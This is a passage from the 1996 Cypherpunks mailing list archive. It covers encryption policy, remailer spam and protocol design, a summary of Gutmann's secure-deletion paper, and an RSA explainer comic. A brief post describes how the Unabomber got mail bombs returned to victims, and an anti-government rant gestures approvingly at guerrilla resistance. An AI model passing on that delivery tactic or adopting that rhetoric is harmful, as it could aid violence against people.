> > >From Edupage, 10 September 1996: > >A leading Clinton Administration official ... Michael Nelson, who adds > >that organized crime members are already some of the most sophisticated > >users of computer systems and strong encryption technology. In addition, > >computer crackers will pose a more significant threat. > > The bad guys already have strong encryption. So why doesn't the Clinton > administration immediately press for the widespread deployment of strong > encryption to help defend us against the bad guys? > > > ------------------------------------------------------------------------- > Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting > (408)356-8506 | choice for best movie of | 16345 Englewood Ave. > frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA > > // declan at eff.org // I do not represent the EFF // declan at well.com // From andy at CCMSD.chem.uga.edu Wed Sep 11 22:19:02 1996 From: andy at CCMSD.chem.uga.edu (Andy Dustman) Date: Thu, 12 Sep 1996 13:19:02 +0800 Subject: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Looks like Spambo either deleted his id or Julf pulled the plug on him. Andy Dustman / Computational Center for Molecular Structure and Design / UGA ===== For PGP public key: finger andy at neptune.chem.uga.edu | pgp -fka ===== Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net http://charon.chem.uga.edu/~andy mailto:andy at CCMSD.chem.uga.edu <}+++< - ---------- Forwarded message ---------- Date: Thu, 12 Sep 96 04:36:13 +0300 From: daemon at anon.penet.fi To: andy at ccmsd.chem.uga.edu Subject: Anonymous service rejected your mail. You, andy at ccmsd.chem.uga.edu, have requested mail forwarding to na673130. This was rejected, as the user is unknown. Either the id has never been allocated, or the id has been removed at the request of the user. 
Contents of message follows: [deleted] From tcmay at got.net Wed Sep 11 22:19:24 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 13:19:24 +0800 Subject: Jury Nullification = Voting One's Conscience Message-ID: At 9:18 PM 9/11/96, Brian Davis wrote: >On Wed, 11 Sep 1996, jonathon wrote: > >> On Wed, 11 Sep 1996, Gary Howland wrote: >> >> > > But the public *is* asked to assent to those methods - your chance >>to vote >> > > on them is known colloquially as "jury duty". >> >> But judges have said that Jury Nullification is not acceptable >> legal practice. > >And other judges have said the opposite. And I don't think there has _ever_ been a case of a juror prosecuted/jailed for voting his or her conscience, regardless of jury instructions. Short of explicitly selling one's vote, or discussing the case during deliberations with outsiders (and probably not even then), one is essentially free to vote one's conscience (however foolishly, as the O.J. case showed). And the principle is a good one: jurors should not have to fear prosecution for voting their consciences, regardless of technical details imposed by a judge. And, of course, jurors are not required to give a court their "reasons" for voting as they do. Though I often condemn aspects of the American political and legal system, it is true that an awful lot of things are done right. --Tim May, who served _once_ on a jury (for a speeding case) in 1973, who was called once since then, but not actually called for a jury. (I vote every election, I am duly registered with the DMV, so I wonder why I have only served once in 24+ years of eligibility.) 
We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Wed Sep 11 22:19:26 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 12 Sep 1996 13:19:26 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <199609112119.OAA04402@mail.pacifier.com> At 03:13 PM 9/11/96 -6, Peter Trei wrote: > >The differences between US and European nomenclature can be subtle, yet >important. Quick - which is likely to have had warmer weather: 1/8/96, or >8/1/96? Sorry to add more complication, but "northern or southern latitude?" Jim Bell jimbell at pacifier.com From rwright at adnetsol.com Wed Sep 11 22:22:05 1996 From: rwright at adnetsol.com (Ross Wright) Date: Thu, 12 Sep 1996 13:22:05 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609120245.TAA28195@adnetsol.adnetsol.com> Sirs: I must agree that having a website invites unsolicited e-mail, if only to comment that people have seen the site. I send unsolicited e-mail to website owners as part of my marketing plan. On Or About: 11 Sep 96 at 21:34, Andy Dustman wrote: > You're sending out messages, inviting people to visit your web site, but > you're using anonymous remailers because... you don't want people to know > who you are? Then why invite them to your site (or even have a site)? That's what makes it smell fishy. When I send unsolicited e-mail I give up the whole deal: phone number and all. If someone complains, I make great effort to never contact that person again. 
Either you want people to know who you are or you don't. > Which is precisely what you're doing: Sending someone e-mail > costs them time and it often costs them money. As I said having a website invites comments. It's like being a public figure. In effect you are publishing your e-mail address. > 4) It's giving us a bad > rap, man, and that's the *last* thing the remailer net needs now. > The remailers of the world don't exist > to provide non-anonymous anonymous advertising, which you could do just as > well on your own sending forged e-mail headers from netcom. Just like all the seedy low life multi-level-marketing jerks! No need to use a remailer for that. Just 2 cents worth. Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From robert at precipice.v-site.net Wed Sep 11 22:26:29 1996 From: robert at precipice.v-site.net (HipCrime) Date: Thu, 12 Sep 1996 13:26:29 +0800 Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]] Message-ID: <32377788.758E@precipice.v-site.net> -- Security is mostly a superstition. It does not exist in nature, nor do the children of men as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing. -- Hellen Keller To: cypherpunks at toad.com Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] From: Admin Date: Wed, 11 Sep 1996 15:20:35 -0600 Cc: remailer-operators at c2.org Sender: owner-cypherpunks at toad.com >This is an absurd and inaccurate analogy. The mailBot simply pushes >*mailto:* tags that people have willingly placed on their public websites. >They invite the mail so a more accurate analogy would be that City Hall puts >up a public suggestion box and invites comments. The bot then puts one, and >only one, unsigned anonymous suggestion into the box. 
It then goes on to the >Art Gallery where they too have put up a public suggestion box, and the bot >places one, and only one, anonymous suggestion in that box also...and it >moves on to the next publicly accessable suggestion box that it finds, each >time putting in one, and only one, message. > >Can the College-aged mind these days not develop a rational, concise, >accurate and logical analogy that stays on point? > >Think about it... or take down the public suggestion boxes if one doesn't >like what one finds inside. If you invite feedback...it will come. > >admin > > >There is >> >>HipCrime wrote: >>> Be honest, all you really care about is something which >>> "threatens the existence" your little baby. >> >>I think you were referring to yourself, Robert. :) >> >> >>Since you don't seem to understand the concept of spam very well yet, >>try this little experiment: >> >>Go downtown to City Hall and post advertisements for your website on >>all the walls and doors. Be sure to put one on the Mayor's office and >>all the members of the City Council. If they complain, explain to them >>why they are weak-minded souls who can't remove unwanted messages. >> >>Go to the local art gallery and post your signs all over. Tell people >>that since your web site is an "art project", that you are posting EXACTLY >>on topic, to an "appropriate group". Ask, "So, what's your problem ?!?" >> >>Pass out survey forms. Ask people where they want to see advertisements. >>Go to these sites and spray-paint your http address. If people complain >>that you are "harassing" them, ask them why a whopping eighteen letters >>written on the wall is harassment. Tell them it's not *your* fault, >>that you're just doing what other people told you to. Explain how many >>trees you are saving by using spray-paint instead of paper. >> >>When the police handcuff you and take you away, complain that they are >>censoring you. Tell the judge that you want to sue the cops for violating >>your civil rights. 
While you're in jail, think about why what you did >>was wrong. <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9¢/min |Helping hardworking people || ||9.9¢ Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From declan at eff.org Wed Sep 11 22:58:37 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 12 Sep 1996 13:58:37 +0800 Subject: What is best policy paper on crypto? Message-ID: I happen to know that an influential Congressperson will be meeting with some Cato folks tomorrow morning, so I'm assuming this isn't an idle request. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // ---------- Forwarded message ---------- Date: Wed, 11 Sep 1996 16:46:09 -0400 From: Solveig Bernstein To: fight-censorship at vorlon.mit.edu Subject: What is best policy paper on crypto? If you folks were to pick one policy paper or book or magazine article that did the best job of explaining why export controls on crypto were bad, and/or why key escrow is not a good idea, which one would you pick? I'm looking for something that would be helpful to a Congressperson. Please feel free to e-mail suggestions to me privately so as not to clutter up the list. ********************************************************************** Solveig Bernstein, Esq. (202) 789-5274 (202) 842-3490 (fax) Assistant Director of Telecommunications & Technology Studies Cato Institute 1000 Mass. Ave. NW Washington, DC 20001 From drose at AZStarNet.com Wed Sep 11 23:14:34 1996 From: drose at AZStarNet.com (David M. Rose) Date: Thu, 12 Sep 1996 14:14:34 +0800 Subject: That Evil Internet, Pt. XXIII Message-ID: <199609120410.VAA11385@web.azstarnet.com> Caught an interesting segment on this evening's PBS news program with Jim Lehrer. 
Two senators were discussing whether the U.S. should sign the international agreement banning chemical warfare. Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and North Korea will never participate. Sen. Nunn responds that we should sign anyway. Besides, he adds in the non sequitur of the week, anyone can get instructions on how to build chemical weapons on the Internet. I guess the Internet isn't just for pornography and conventional bomb-making advice anymore. Dave Rose From Adamsc at io-online.com Wed Sep 11 23:28:50 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 12 Sep 1996 14:28:50 +0800 Subject: Hacking Mobil Telephone System ? Message-ID: <19960912040558171.AAA89@IO-ONLINE.COM> On Wed, 11 Sep 1996 18:56:10 -0400 (EDT), Mark O. Aldrich wrote: >After having traveled in Europe, I was certainly familiar with the >difference in the notation. You also think, however, that I would have >paid more attention to what the hell I was reading before I shot off my >mouth (via my keyboard), but I didn't. I think this is called a "brain >fart" (note to our European brothers and sisters - over there, I think you >call it a "mental fugue" or "Parliamentary election," I'm nor sure which). I've always wondered if the makers of mailer software couldn't include a delay option, so that, say, a message might be held for 10 minutes and then sent. Imagine how many of the "Sorry about x; I meant y" posts we'd never see. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." 
-- Duncan Frissell From snow at smoke.suba.com Wed Sep 11 23:34:59 1996 From: snow at smoke.suba.com (snow) Date: Thu, 12 Sep 1996 14:34:59 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: On Tue, 10 Sep 1996, Stephan Schmidt wrote: > > > One thought : How many of you would support terrorist > > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > > -stephan > > Consdering how none of the above incidents are connected in any way > > to the internet, what do you mean? And what if there were bomb making > Sorry for my bad English, perhaps I got misunderstood. > Would you run a WWW site where the (say there where some) > terrorist who shot down (a wild assumtion too) the TWA plane > claiming it was right and all people should fight 'evil > America'. Because of your web site there are other bomb > attacks in the US (or somewhere else, the country is not that > important) (although it's of course impossible to proove that > this bombings are 'inspired' by your web site). > Would you support the freedom of speech in this way ? If they paid me to host the site, yes. If I agreed with their reasons or goals, I might even give them a discount. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Wed Sep 11 23:59:45 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 12 Sep 1996 14:59:45 +0800 Subject: (Fnord) Edupage, 10 September 1996 Message-ID: <199609120436.VAA06548@mail.pacifier.com> >------- Forwarded Message Follows ------- >************************************************************ >Edupage, 10 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. 
>************************************************************ > >TOP STORIES > Wired World Will "Diminish National Sovereignty" >[..] >WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" >A leading Clinton Administration official on information security and >cryptography matters says that traditional notions of sovereignty, national >security and warfare will be undermined by the year 2020, when the whole >world is "wired" and e-cash is the norm. 24 years from now? He thinks it'll take that long?!? 24 years _ago_ the 4004 microprocessor barely existed. And if anything, change is accelerating very rapidly. >The result will be less powerful >governments in relation to criminal organizations such as the Mafia and >international drug cartels, Organizations which exist only because of the existence of government... >says Michael Nelson, who adds that organized >crime members are already some of the most sophisticated users of computer >systems and strong encryption technology. In addition, computer crackers >will pose a more significant threat. In response, Nelson advocates >resolving the issue of whether unauthorized access of a computer is an "act >of trespass" or an "act of war," and prosecuting the intrusions accordingly. >(BNA Daily Report for Executives 6 Sep 96 A14) I'd sure like to be able to corner this guy and point out that there are people who believe that _regulating_ the Internet should either be considered an "act of trespass" or an "act of war." And does he want to be punished, or merely stopped? Jim Bell jimbell at pacifier.com From stewarts at ix.netcom.com Thu Sep 12 00:01:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 12 Sep 1996 15:01:16 +0800 Subject: Bay Area Cypherpunks Meeting Saturday 9/14, 12-6PDT, Stanford Message-ID: <199609120456.VAA14292@dfw-ix11.ix.netcom.com> The monthly Bay Area Cypherpunks Meeting will be held Saturday, September 14th, at the picnic tables outside Tressider Hall at Stanford University. 
Lunch and general hanging out begin at 12:00, Program begins at 1:00. The coffee shop at Tressider will be open, though the main cafeteria won't be.

Some items on the agenda include
    John Gilmore's SWAN project, Encrypting 5% of the net by Christmas
    Highlights of Crypto '96 meeting in Santa Barbara
    Bagels and bagel paraphernalia
    The remailer crisis - anon.penet.fi, creative new spammer attacks
    Censorship Firewalls for SG, CN, DE, etc. - designing workarounds
    The Bernstein Lawsuit - court date is Friday Sept. 20

Bring show&tell items. You can find a map of the Stanford campus on the web at http://www.stanford.edu/home/visitors/campus-map.html To confuse Stanford alumni, the map has been realigned with the North end up, so visitors can use it. From Campus Drive East, turn North on Mayfield Ave, turn right on Lagunita Dr, and park in the lot. Walk north to Tressider, and the tables are on the west=left side. Look for the crowd of drug smugglers, money launderers, and Suspicious Persons. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Thu Sep 12 00:46:43 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 15:46:43 +0800 Subject: 10 minute delay considered inconsequential Message-ID: At 4:15 AM 9/12/96, Adamsc wrote: >I've always wondered if the makers of mailer software couldn't include a delay >option, so that, say, a message might be held for 10 minutes and then sent. >Imagine how many of the "Sorry about x; I meant y" posts we'd never see. I expect there would be little effect. I suspect most of us write articles, send them out, and only notice the mistakes, typos, whatever when they are pointed out. (Very few people reread their posts prior to seeing them on the list an hour or two later, is my strong hunch. 
A delay of 10 minutes would not inspire many to read and reread their posts...most likely they'd just move on to other articles, other posts, and the 10 minute delay would be utterly inconsequential.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From saione at primenet.com Thu Sep 12 00:48:14 1996 From: saione at primenet.com (!.!..............................#) Date: Thu, 12 Sep 1996 15:48:14 +0800 Subject: robert and hipcirme web sight Message-ID: <199609120544.WAA11273@primenet.com> >It's obvious that this guy's true passion is fractals and raytracing. >He threw in some bomb-making stuff, but he scanned it out of a book and >probably never tried it. Compared to the rest of the site, it looks like >an afterthought. Someone who was really interested in chemistry would >have taken the time to retype the info and add their own comments. He >had a reason to have some "anarchist" info on there but he's not really >interested in it. So basically this guy is a mathematician/artist trying >to pretend he's an anarchist. If his true passion is fractals and raytracing, then why would he expend energy on things other than fractals and raytracing. He may be an anarchist but wish to invest his time in fractals and raytracing rather than in explaining anarchy. >Same goes for the remailers. He claims he likes remailers and anonymity, >but he's lying. Anyone who really liked remailers/anonymity/privacy would >have pages and pages about how to use remailers, and why privacy is a good >thing. 
He has a reason he needs to be anonymous, but it's not because >he supports privacy. He publishes a PGP key, because he wants to pretend >he's an anarchist, and Louis Freeh told him that all evil terrorist >organizations use PGP. But he doesn't like PGP, he doesn't advocate PGP, >and he doesn't tell you where to get PGP. If his true passion were re-mailers and anonymity then he would spend pages and pages writing about them rather than just admitting to supporting them. .00010000. From attila at primenet.com Thu Sep 12 01:13:58 1996 From: attila at primenet.com (attila) Date: Thu, 12 Sep 1996 16:13:58 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: <199609110733.DAA04996@unix.asb.com> Message-ID: <199609120534.XAA06832@InfoWest.COM> another paranoid fantasy and impending preemptive strike by Bubba, or by the NWO? BTW, I really do not care how the NWO is defined --big government serving its own interests works just as well, so forget flaming me on the NWO. please do keep in mind, however, that the CFR has a undue amount of influence in Washington and the CFR is the bastion of established wealth. this is a blatant statement that our government ("of and for the people") has every intention of fully controlling the content of * everything * we see. The five media conglomes already toe the line in the interests of the NWO. What the NWO failed to consider in their plans was the explosion of the net, and * free * information --the inability of the ruling order to control the news, and stifle mass market criticism before it becomes a topic of general discussion. Bubba's mouthpiece uttered the classic incompetent government under attack mentality response to the problem: "...hey, joe criminal uses sophisticated computer encryption to plot his crimes. why must we be subject to criminals? let's ban all communication [we can not control]...." 
the suggestion that if commerce was permitted secure cryptography, secure servers, and able to develop its own safety net, the incentive would then not be worth the cost of the mob cracking the codes (they would be reduced back to the usual reliance on an inside job which will be harder and harder with better security) No, but that solution does not serve the purpose of statist governments controlling * everything * personally, I am even more pessimistic than that: America is being destroyed by the actions of our leaders and their puppet-meisters:

1. the rewriting of educational textbooks by grant dependent university professors.

2. the rewrite of history to reflect not only the politically correct views, but to reflect history as the elite wish to see it --even to the point of rewriting quotations of Thomas Jefferson to suit their purpose.

3. the destruction of the means of investment by permitting an "unregulated" economy built on the greed of an elitist "core" of stock brokers who block consumer actions until their own manipulations have set the pace for their own gains.

4. the destruction of a solvent government by the debt-based economy of the Federal Reserve Bank which is not even owned by the central government.

5. the destruction of the educational system by reverting to education by the lowest common denominator. how can young adults who graduate from high school with an education which leaves them functionally literate enough to take a driver's license and mathematically skilled only well enough to balance a check book be considered "educated, well-informed" citizens?

6. the destruction of any work-incentive by the establishment of a welfare society. the message today is that it is "socially acceptable" to accept the dole; in fact, it is preferable to demeaning oneself with entry-level work.

Is it any wonder why the U.S. has dropped below #20 in the educational sweepstakes of "Western" culture. 
The result is a population base which is Joe-Six-Pack * at best, * functional to the point of being able to turn on a TV for 18 hours a day --the average viewing time of the American public is now 7.2 hours * per day, * according to one recent report. Another report states that the average 6 year old today has seen >2,000 murders... is there any question why there is no value on life? bubba is acting with "fear" as his motto. Dole wants to literally wipe out drugs, even to the point of putting a soldier on every street corner. are we down to this? 1935 will go down in history! For the first time a civilized nation has full gun registration! Our streets will be safer, our police more efficient, and the world will follow our lead in the future! --Adolf Hitler 46. The U.S. government declares a ban on the possession, sale, transportation, and transfer of all non-sporting firearms. ...Consider the following statement: I would fire upon U.S. citizens who refuse or resist confiscation of firearms banned by the U.S. government. --The USMC 29 Palms Combat Arms Survey The survey was given to virtually all special combat units of the Marine Corps (including my son), USArmy special units, Navy Seals, &c. depending on which survey, there were 42 to 54 questions; the government told the men that the major giving the "quiz" was doing a master's paper, or some such poppycock. The government's intent is clear, the above is how they intend to enforce it, and either we stop it now, or there will be no stopping it. guns are a part of it since it denies the ability of "We, the people..." to take offensive action against the government with even reasonable _personal_ firepower --never mind the sophistication of the government arsenal. The only thing in the peoples' favour is that guerilla warfare is extremely difficult to deal with. Why has it gone this far? because Joe-Six-Pack will sell all his freedom in return for the promised security. who is the Judas goat? the captive press. 
there is no need to subscribe to conspiracy theories --there are enough facts of the table that conspiracies are irrelevant. but, the statement that a "wired world will 'diminish national sovereignty' is absolutely true --governments might just be fully accountable. one of the few things we all share: the utter, corrosive contempt for our elected officials. =------- Forwarded Message Follows from Edupage of 10 Sep ------- =WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" =A leading Clinton Administration official on information security and =cryptography matters says that traditional notions of sovereignty, =national security and warfare will be undermined by the year 2020, =when the whole world is "wired" and e-cash is the norm. The result =will be less powerful governments in relation to criminal =organizations such as the Mafia and international drug cartels, says =Michael Nelson, who adds that organized crime members are already =some of the most sophisticated users of computer systems and strong =encryption technology. In addition, computer crackers will pose a =more significant threat. In response, Nelson advocates resolving the =issue of whether unauthorized access of a computer is an "act of =trespass" or an "act of war," and prosecuting the intrusions =accordingly. (BNA Daily Report for Executives 6 Sep 96 A14) = (Courtesy of Edupage) From JonWienk at ix.netcom.com Thu Sep 12 01:18:39 1996 From: JonWienk at ix.netcom.com (JonWienk at ix.netcom.com) Date: Thu, 12 Sep 1996 16:18:39 +0800 Subject: strengthening remailer protocols In-Reply-To: <9609101751.AA00594@ch1d157nwk> Message-ID: <199609120618.XAA27372@dfw-ix12.ix.netcom.com> On Tue, 10 Sep 96, Andrew Loewenstern wrote: >Wei Dai writes: >> How about a combination of the two? Suppose Alice wants to >> anonymously post a message and get replies. She generates a >> new RSA key, signs her post with it, and asks readers to send >> encrypted replies to a server. 
Then periodically she sends a >> one-time reply block to the server to retrieve the accumulated >> replies. > >I'd like to chime in and say that this is a really good idea. Basically a >nymserver that holds onto incoming mail until an e-mail arrives from the nym >to retrieve it. Instead of that, how about this? 1. Create a pool of N remailers, each with its own set of public/private key pairs. The public key(s) for each remailer are widely disseminated. Each remailer also publishes a list of other remailers that it will poll for messages. (More about this later.) 2. Each remailer user MUST have at least 1 public/private key pair per nym. The public key should be widely available. 3. Each message is encrypted with the intended recipient's (nym's) public key, and then with each remailer's public key successively, but in reverse order. (The message is encrypted last with the public key of the first remailer in the chain.) The chain is determined by selecting some subset of N at random, with the set growing as the need for security increases. Encryption is done a la PGP, with a header prepended to the message containing the fingerprint of the public key used to encrypt the session key used to encrypt the actual message. Each layer of encryption encrypts the header of the previous layer of encryption as well as the message, so only the last encryption is "visible", and it is not feasible to detect the number of encryptions by examining the message. 4. The multiply-encrypted message is sent to the first remailer in the chain. The remailer decrypts the message with its private key, and at this point one of two things can happen. If the decrypted message specifies an email address, the remailer sends the message to the specified address. Otherwise, it posts it in a publicly available database with 3 fields. 2 are public; one contains the key fingerprint of the outermost public encryption key, and the other contains the message itself. 
The third, private field contains the date/time the record was added to the database. Any appropriate techniques for reducing input/output correlation can be used, such as delaying the decryption for random time intervals, dummy messages between remailers, etc. Remailer-to-remailer traffic (or to any nym that gets a lot of traffic) should be bundled together (take a few hours worth of traffic going to a specific nym, ZIP it into one large message, and re-encrypt using that nym's public key) to prevent a sender from being able to recognize any of his messages in transit. 5. Anyone can do lookups in the public fields of the message database by key fingerprint. Remailer users do this to download their messages, and remailers download messages from other remailers in this manner as well. Anyone can download any message in the database; only the intended recipient will be able to decrypt it. Messages are not deleted when they are downloaded; instead they are kept for a fixed period of time (determined by the remailer operator) and then deleted. If users are required to download other people's messages, tracing a message to one specific person will be much more difficult. 6. Steps 4 and 5 are repeated until the final recipient receives his message and decrypts it, at which time crypto-anarchic utopia can resume. Randumb Thotz: Given an encryption program with a database of which remailers poll other remailers, remailer chaining can be automated, and be done randomly. If 2 nyms can agree to poll a mutually known set of remailers, (such as via anonymous Usenet/Blacknet postings) 2-way anonymous correspondence can occur without either nym having to know the other nym's email address. The remailer operators wouldn't know either, but they may be able to make reasonably informed guesses at recipient-nym relationships via analysis of database browsing patterns. This is the weakest part of the proposal, and suggestions for preventing this would be appreciated. 
Remailers should use SSL or other encrypted communication protocols to ensure that third parties cannot observe who is browsing what in the public message databases. Jonathan Wienke From frantz at netcom.com Thu Sep 12 01:19:23 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 16:19:23 +0800 Subject: Erasing Disks Message-ID: <199609120609.XAA05442@netcom8.netcom.com> I was asked of an outline of Peter Gutmann's paper, "Secure Deletion of Data from Magnetic and Solid-State Memory" in The Sixth USENIX Security Symposium Proceedings in private mail. Since I think the question is of general interest I am posting the answer and Bccing the original questioner. The paper starts with the comment that most secure data destruction guides are classified. There is the suspicion that the unclassified ones do not cover the newer recording materials and techniques, and will not protect you against government attackers. The analysis techniques for disks examined were Magnetic Force Microscopy (MFM) and its close cousin, Magnetic Force Scanning Tunneling Microscopy (STM). "It is possible to build a reasonably capable SPM for about US$1400, using a PC as a controller." (See http://www.skypoint.com/~members/jrice/STMWebPage.html) This cost is conceivably within the range of a high school student. Peter discusses the way that data can be recovered from under new data (due to the difference in the magnetic domains depending on whether the bits were the same or different), and beside new data due to positioning errors of the head. When trying to develop a secure erasure technique, you need to know the encoding technique used on the disk. (e.g. FM, MFM, RLL, PRML etc.) 
He recommends a 35 pass erasure scheme as follows:

Pass    Data
1-4     Random
5       0x55
6       0xAA
7       0x924924
8       0x492492
9       0x249249
10      0x00
11      0x11
12      0x22
13      0x33
14      0x44
15      0x55
16      0x66
17      0x77
18      0x88
19      0x99
20      0xAA
21      0xBB
22      0xCC
23      0xDD
24      0xEE
25      0xFF
26      0x924924
27      0x492492
28      0x249249
29      0x6DB6DB
30      0xB6DB6D
31      0xDB6DB6
32-35   Random

He recommends using cryptographically random numbers and randomly permuting the deterministic passes to further confuse attackers. He warns about disabling any disk caches which may be present, and discusses the problems of erasing data on now-bad sectors. He points out that data which has been left for a long time is harder to erase than recently written data. He mentions that the most powerful commercially available degaussers aren't powerful enough to erase modern disks or DAT tapes. (N.B. Degaussing a disk will also erase the factory-written control tracks, making the disk useless.) He notes that ECC may make destruction of data more difficult. He recommends burning floppy disks. He also discusses recovering data from DRAM and SRAM devices. He mentions that data which has been stored in DRAM for 10 minutes will be detectable after power is removed. He recommends that sensitive data (such as crypto keys) have their bits flipped every second or so. This technique has the beneficial side effect that the page remains recently used and is less likely to be paged out. I quote from his conclusion, "Data overwritten once or twice may be recovered by subtracting what is expected to be read from a storage location from what is actually read. Data which is overwritten an arbitrarily large number of times can still be recovered provided that the new data isn't written to the same location as the original data (for magnetic media), or that the recovery attempt is carried out fairly soon after the new data was written (for RAM). 
For this reason it is effectively impossible to sanitize storage locations by simple overwriting them, no matter how many overwrite passes are made or what data patterns are written. However by using the relatively simple methods presented in this paper the task of an attacker can be made significantly more difficult, if not prohibitively expensive." ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From JonWienk at ix.netcom.com Thu Sep 12 01:20:01 1996 From: JonWienk at ix.netcom.com (JonWienk at ix.netcom.com) Date: Thu, 12 Sep 1996 16:20:01 +0800 Subject: 16oz packages In-Reply-To: Message-ID: <199609120618.XAA19460@dfw-ix9.ix.netcom.com> The Unabomber used his intended victim's address for the return address on several of his mail bombs, and then used insufficient postage on them to ensure that they would be "returned to sender." It would seem that the same tactic could be used now, if packages over 16oz are "sent back." How are we any safer now? From scrappo.reverb at juno.com Thu Sep 12 03:02:41 1996 From: scrappo.reverb at juno.com (A L) Date: Thu, 12 Sep 1996 18:02:41 +0800 Subject: An old _Discover_ article explaining RSA Message-ID: <19960911.212157.4415.0.scrappo.reverb@juno.com> I had found this article in an issue of Discover I've had for a few years. It is a comic strip-type article by Larry Gonick explaining, in layman's terms, the very basics of RSA. This article was printed in the April 1992 issue of Discover magazine (some liberties taken regarding pictures, etc.). Box1:Prime Time featuring SEYMOUR Cloak-and-Dagger Mathematician! (sh!) Box2:PRIME NUMBERS-numbers that can't be broken into a product of smaller factors- have always been one of the most amusing and USELESS topics in mathematics. 
Box3:Then why are Banks, Businesses, Mathematicians, and Government SPY AGENCIES fighting over prime numbers? (STOP RIGHT THERE!) Box4:It has to do with CRYPTOGRAPHY-secret codes. (The patriotic thing to do would be NOT to read one more word!) Box5:In the computer age, cryptography is MATHEMATICAL: Inside the computer, every MESSAGE is a string of ONES and ZEROES: a number, in other words. (PLEASE!!!) Box6:ENCRYPTING a message means scrambling this number, using a reversible formula based on a secret number or numbers called the KEY. message-->key-->cyphertext DECRYPTING the cyphertext is done by applying the key in reverse. Box7:It would seem that both the sender and receiver need to know- and conceal-the key, but in the 1970's, WHITFIELD DIFFIE and MARTIN HELLMAN showed a way to MAKE KEYS PUBLIC! (Hippy-Diffie!) Box8:Knowing how to SCRAMBLE, said Diffie, is not the same as knowing how to UNSCRAMBLE. Consider the egg!!! Box9:Suppose a code had TWO KEYS, a scrambler and an UNSCRAMBLER... and suppose it was IMPOSSIBLE to compute one key from the other-in the sense that no computer could do it in less than the lifetime of the UNIVERSE??? (crank crank crank) Box10:You'd have an UNBREAKABLE CODE! (Wait... Almost got it...) Box11:It works like this: Everyone owns a unique pair of keys. One remains private. But the other, public key is listed in a directory. To send me a message, you look up my public key and use it to scramble the message. My private key is the only way to unlock the message. Result:total secrecy and privacy!! Box12:Diffie's idea soon became a reality, as three guys at M.I.T. created a public-key algorithm known as RSA, from their initials. (picture)Rivest (picture)Shamir (picture)Adleman Box13:RSA's unbreakability depends on the "impossibility" of FACTORING large numbers. (15? that's 3 x 5! Easy!) (3,447,981,101,346,271,113,552,476,003,201, 119,181,244,551,900,123,549,822,344,722,436,001? um..) 
